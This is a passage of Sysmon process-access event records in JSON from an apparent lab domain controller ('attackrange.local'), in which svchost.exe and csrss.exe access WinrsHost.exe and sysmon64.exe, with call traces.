05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4778,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-0010D2950700}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-0010D2950700}","TargetProcessId":"672","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4779,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-0010D2950700}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-0010D2950700}","TargetProcessId":"672","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4780,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4781,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4782,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4783,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4784,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4785,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4786,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 